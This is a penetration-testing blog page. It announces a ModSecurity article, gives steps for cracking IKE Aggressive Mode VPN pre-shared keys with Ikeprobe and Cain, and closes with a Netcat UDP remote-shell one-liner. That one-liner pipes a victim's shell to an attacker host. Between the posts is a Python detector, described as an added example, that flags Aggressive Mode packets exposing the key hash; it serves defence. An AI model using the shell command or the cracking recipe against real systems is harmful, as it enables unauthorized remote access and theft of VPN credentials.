I wrote an article about ModSecurity, an Apache module that works as an application firewall. The paper is written in Spanish because of the lack of Spanish documentation about it. I wrote it for a monthly publication of the company I work for.
You can get it at:
HTML Version: http://www.isecauditors.com/es/iseclab4.html
PDF Version: http://www.isecauditors.com/downloads/artic/iseclab4.pdf
Enjoy
Edge-security blog about Penetration testing, OSINT, security tools, and other interesting stuff.
Friday, May 27, 2005
Thursday, May 12, 2005
IKE Aggressive Mode Cracking
If you are doing a pentest and you find a VPN server, there is a chance that it supports Aggressive Mode. So what can we do?
1-Use Ikeprobe to check whether the server supports Aggressive Mode: ikeprobe ipserver
2-If we are lucky and there is a match, we have to configure a VPN client (Safenet, for example) with the information we have. We don't have the pre-shared key, but that doesn't matter; that is what we are looking for.
3-Before firing up the VPN client, we have to set Cain to sniff the network traffic.
4-After the failed attempt, Cain will have sniffed the pre-shared key hash; now we send it to the Cain cracker.
5-Then we can launch a dictionary attack and, if it fails, try a brute-force attack. We have to wait and wait... until the password is revealed.
That's all.
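The hash Cain picks up in step 4 is visible because an Aggressive Mode reply carries its HASH payload unencrypted, and that is something a defender can look for on the wire. The following is an added example, not code from the original post: it parses the ISAKMP header and payload chain as laid out in RFC 2408 and flags such messages. The function names and the zero-filled sample datagrams are constructed for illustration.

```python
import struct

# ISAKMP exchange and payload type numbers from RFC 2408
EXCHANGE_NAMES = {2: "main", 4: "aggressive", 5: "informational"}
PAYLOAD_NAMES = {1: "SA", 4: "KE", 5: "ID", 8: "HASH", 10: "NONCE", 13: "VID"}

def parse_isakmp(datagram):
    """Parse an IKEv1 UDP payload; return (exchange, encrypted, payload names)."""
    if len(datagram) < 28:
        raise ValueError("shorter than the 28-byte ISAKMP header")
    _icookie, _rcookie, nxt, version, exch, flags, _msgid, length = struct.unpack(
        "!8s8sBBBBII", datagram[:28])
    if version >> 4 != 1:
        raise ValueError("not IKEv1")
    encrypted = bool(flags & 0x01)  # bit 0 of the flags byte: payloads are encrypted
    payloads, offset, end = [], 28, min(length, len(datagram))
    while nxt != 0 and not encrypted:
        if offset + 4 > end:
            raise ValueError("truncated payload chain")
        following, _reserved, plen = struct.unpack("!BBH", datagram[offset:offset + 4])
        if plen < 4 or offset + plen > end:
            raise ValueError("bad payload length")
        payloads.append(PAYLOAD_NAMES.get(nxt, str(nxt)))
        nxt, offset = following, offset + plen
    return EXCHANGE_NAMES.get(exch, str(exch)), encrypted, payloads

def exposes_psk_hash(datagram):
    """True when an Aggressive Mode message carries a HASH payload in the clear."""
    try:
        exchange, encrypted, payloads = parse_isakmp(datagram)
    except ValueError:
        return False
    return exchange == "aggressive" and not encrypted and "HASH" in payloads

def build_sample(exchange, chain):
    """Constructed test datagram with zero-filled payload bodies (not captured traffic)."""
    body = b""
    for i, (_ptype, size) in enumerate(chain):
        following = chain[i + 1][0] if i + 1 < len(chain) else 0
        body += struct.pack("!BBH", following, 0, 4 + size) + bytes(size)
    header = struct.pack("!8s8sBBBBII", b"I" * 8, b"R" * 8, chain[0][0], 0x10,
                         exchange, 0, 0, 28 + len(body))
    return header + body

# Constructed samples: an Aggressive Mode reply (SA, KE, NONCE, ID, HASH) and a Main Mode reply
AGGRESSIVE_REPLY = build_sample(4, [(1, 44), (4, 128), (10, 20), (5, 8), (8, 20)])
MAIN_REPLY = build_sample(2, [(1, 44), (13, 16)])
```

Run over the UDP port 500 payloads from a gateway-side capture, a True result from exposes_psk_hash means the gateway answered in Aggressive Mode and its pre-shared key can be guessed offline.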
Netcat UDP shell
Here is a little memory helper for one use of Netcat: a UDP shell.
On the attacker:
Terminal 1: nc -lun -p 4444
Terminal 2: nc -lun -p 5555
On the Victim:
echo""|nc -un ipattacker 4444 | nc -un ipattacker 5555
So you type the commands in Terminal 1 and you receive the output in Terminal 2.
This also applies to TCP.